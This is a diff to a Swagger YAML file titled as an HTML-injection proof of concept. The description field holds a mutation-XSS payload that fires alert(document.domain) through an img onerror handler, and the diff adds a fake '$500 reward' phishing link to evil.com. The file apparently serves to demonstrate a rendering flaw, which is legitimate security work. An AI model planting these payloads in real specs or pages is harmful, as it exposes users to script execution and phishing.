--- a/test.yaml
+++ b/test.yaml
@@ -2,6 +2,7 @@ swagger: '2.0'
 info:
   title: HTML INJECTION FOR POC PURPOSE
   description: |
+    <h1>To get free 500$ reward, please go to our patner website <h1><a href="https://evil.com">Click Here</a></h1></h1>
     <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src=1></form>
 
   version: production
